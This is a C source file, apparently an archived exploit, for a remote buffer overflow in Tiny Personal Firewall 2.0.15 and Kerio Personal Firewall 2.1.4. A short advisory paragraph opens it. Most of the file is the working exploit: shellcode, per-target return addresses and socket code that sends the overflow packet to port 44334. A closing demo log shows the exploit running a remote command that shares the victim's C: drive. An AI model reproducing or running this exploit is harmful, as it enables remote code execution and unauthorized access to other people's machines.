213 lines
No EOL
6 KiB
C
213 lines
No EOL
6 KiB
C
// source: https://www.securityfocus.com/bid/7180/info
|
||
|
||
A buffer-overflow vulnerability has been discovered in Kerio Personal Firewall. The problem occurs during the administration authentication process. An attacker could exploit this vulnerability by forging a malicious packet containing an excessive data size. The application then reads this data into a static memory buffer without first performing sufficient bounds checking.
|
||
|
||
Successful exploits of this vulnerability may allow an attacker to execute arbitrary commands on a target system, with the privileges of the firewall.
|
||
|
||
Note that this vulnerability affects Kerio Personal Firewall 2.1.4 and earlier.
|
||
|
||
/**************************************************************
|
||
* Personal Firewall Engine remote buffer overflow Exploit
|
||
**************************************************************
|
||
*
|
||
* Original information shared by CORE Security Technologies.
|
||
* ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
||
* http://www.coresecurity.com/common/showdoc.php?idx=314&idxseccion=10
|
||
* ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
||
* Released : 30/04/2003
|
||
*
|
||
* Coded By ThreaT.
|
||
* ThreaT@Ifrance.com
|
||
* http://s0h.cc/~threat
|
||
*
|
||
********************************************************************
|
||
*
|
||
* This exploit take advantage of the vulnerability discovered by
|
||
* CORE Security Technologies for execute a command on remote workstations
|
||
* equiped with the fallowing PSW :
|
||
*
|
||
* - Tiny Personal Firewall 2.0.15
|
||
* - Kerio Personal Firewall 2.1.4
|
||
*
|
||
*********************************************************************
|
||
*
|
||
* Usage : PFExploit.exe <target> <victim_ip> <command to execute>
|
||
*
|
||
* =====================================================================
|
||
* !! compile with : cl.exe /nologo PFExploit.c /link wsock32.lib !!
|
||
* =====================================================================
|
||
*/
|
||
|
||
|
||
#include <windows.h>
|
||
#include <winsock.h>
|
||
|
||
#define len 0x1494
|
||
|
||
void main (int argc, char *argv[])
|
||
{
|
||
SOCKET sock1;
|
||
SOCKADDR_IN sin;
|
||
int i;
|
||
DWORD byte = htonl(len);
|
||
|
||
char buffer[len], *p,
|
||
|
||
shellcode[] =
|
||
|
||
"\xEB\x69\x6A\x30\x5B\x64\x8B\x03\x8B\x40\x0C\x8B\x48\x0C\x8B\xC1"
|
||
"\x8B\x70\x30\x80\x3E\x4B\x75\x4A\x8B\x40\x18\x8B\x58\x3C\x03\xD8"
|
||
"\x8B\x5B\x78\x03\xD8\x8B\x73\x1C\x03\xF0\x56\x8B\x73\x24\x03\xF0"
|
||
"\x56\x8B\x53\x20\x03\xD0\x8B\x5B\x18\x4B\x8B\x34\x9A\x03\xF0\x03"
|
||
"\x74\x24\x10\x8B\x36\x39\x74\x24\x0C\x74\x08\x4B\x23\xDB\x75\xEA"
|
||
"\x58\x58\xC3\x5F\x33\xC9\x66\x8B\x0C\x5F\x5F\x8B\x3C\x8F\x8D\x04"
|
||
"\x07\xC3\x8B\x18\x39\x08\x8B\xC3\x75\xA6\xC3\xEB\x22\x6A\x01\x68"
|
||
"\x69\x6E\x45\x78\xE8\x89\xFF\xFF\xFF\x6A\x01\xFF\x74\x24\x0C\xFF"
|
||
"\xD0\x6A\x01\x68\x78\x69\x74\x50\xE8\x75\xFF\xFF\xFF\xFF\xD0\xE8"
|
||
"\xD9\xFF\xFF\xFF";
|
||
|
||
WSADATA wsadata;
|
||
WORD wVersionRequested = MAKEWORD (2,0);
|
||
|
||
struct _target {
|
||
|
||
char Name[4];
|
||
char *RetAddr;
|
||
char *App;
|
||
|
||
} targ[2] = {
|
||
|
||
{"TPF" , "\xED\xEA\x2F\x01", "Tiny Personal Firewall 2.0.15"},
|
||
{"KPF" , "\xF8\xEA\x61\x01", "Kerio Personal Firewall 2.1.4"},
|
||
};
|
||
|
||
|
||
printf ("#############################################################\n"
|
||
"Personal Firewall Engine, Remote buffer overflow Exploit !\n"
|
||
"#############################################################\n"
|
||
"Discovered by CORE Security Technologies & Coded by ThreaT\n-\n"
|
||
"ThreaT@Ifrance.com\n"
|
||
"http://s0h.cc/~threat\n-\n\n");
|
||
|
||
if (argc < 4)
|
||
{
|
||
printf ("usage : PFExploit.exe <target> <victim_ip> <command to execute>\n\n"
|
||
"TARGET ARE\n"
|
||
"__________\n\n"
|
||
"TPF : for Tiny Personal Firewall 2.0.15\n"
|
||
"KPF : for Kerio Personal Firewall 2.1.4\n\n");
|
||
|
||
ExitProcess (0);
|
||
}
|
||
|
||
if (!(p = (char *) LocalAlloc (LPTR,(strlen (shellcode)+strlen(argv[3])+3))))
|
||
{
|
||
printf ("error, cannot allocate memory\n");
|
||
ExitProcess (0);
|
||
}
|
||
|
||
|
||
memset (buffer,0x90,len);
|
||
|
||
strcpy (p,shellcode);
|
||
lstrcat (p,argv[3]);
|
||
memcpy (&buffer[200],p,strlen (p)+1);
|
||
|
||
for (i=0; i < 2 ; i++)
|
||
if (!lstrcmpi (argv[1],targ[i].Name)) break;
|
||
|
||
if (i > 1)
|
||
{
|
||
printf ("Erreur : la cible %s est inconnue\n",argv[1]);
|
||
ExitProcess (0);
|
||
}
|
||
|
||
|
||
if (WSAStartup(wVersionRequested, &wsadata))
|
||
{
|
||
printf ("Erreur d'initialisation Winsock\n");
|
||
ExitProcess (0);
|
||
}
|
||
|
||
|
||
sin.sin_family = AF_INET;
|
||
sin.sin_addr.s_addr=inet_addr (argv[2]);
|
||
sin.sin_port = htons (44334);
|
||
|
||
|
||
memcpy (&buffer[0x1490],targ[i].RetAddr,4);
|
||
|
||
printf ("Cible : %s\n\n"
|
||
"Connecting to %s...", targ[i].App, argv[2]);
|
||
|
||
sock1 = socket (AF_INET, SOCK_STREAM, 0);
|
||
bind (sock1, (SOCKADDR *)&sin, sizeof (sin));
|
||
if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) )
|
||
{
|
||
printf ("connexion failed !\n");
|
||
ExitProcess (0);
|
||
}
|
||
|
||
printf ("ok!\n\n"
|
||
"sending crash for remote execution of '%s'...",argv[3]);
|
||
|
||
Sleep (1000);
|
||
send (sock1,(const char FAR *)(DWORD)&byte,sizeof (DWORD),0);
|
||
send (sock1,buffer,len,0);
|
||
|
||
puts ("ok");
|
||
|
||
}
|
||
|
||
/* DEMO ON MY LAN *
|
||
|
||
D:\code\exploits\kerio>ipconfig
|
||
|
||
Configuration IP de Windows 2000
|
||
|
||
Ethernet carte Connexion au r<>seau local 2<>:
|
||
|
||
<20>tat du media . . . . . . . . . . : C<>ble D<>connect<63>
|
||
|
||
Ethernet carte Connexion au r<>seau local<61>:
|
||
|
||
Suffixe DNS sp<73>c. <20> la connexion. : ThreaT.lan
|
||
Adresse IP. . . . . . . . . . . . : 10.0.0.1
|
||
Masque de sous-r<>seau . . . . . . : 255.0.0.0
|
||
Passerelle par d<>faut . . . . . . : 10.0.0.138
|
||
|
||
D:\code\exploits\kerio>net view \\10.0.0.3
|
||
La liste est vide.
|
||
|
||
|
||
D:\code\exploits\kerio>PFExploit TPF 10.0.0.3 "cmd /c net share c=c:\"
|
||
#############################################################
|
||
Personal Firewall Engine, Remote buffer overflow Exploit !
|
||
#############################################################
|
||
Discovered by CORE Security Technologies & Coded by ThreaT
|
||
-
|
||
ThreaT@Ifrance.com
|
||
http://s0h.cc/~threat
|
||
-
|
||
|
||
Cible : Tiny Personal Firewall 2.0.15
|
||
|
||
Connecting to 10.0.0.3...ok!
|
||
|
||
sending crash for remote execution of 'cmd /c net share c=c:"'...ok
|
||
|
||
D:\code\exploits\kerio>net view \\10.0.0.3
|
||
Ressources partag<61>es de \\10.0.0.3
|
||
|
||
|
||
|
||
Nom Type Local Remarque
|
||
|
||
-------------------------------------------------------------------------------
|
||
c Disque
|
||
La commande s'est termin<69>e correctement.
|
||
|
||
|
||
D:\code\exploits\kerio>
|
||
|
||
* EOF */ |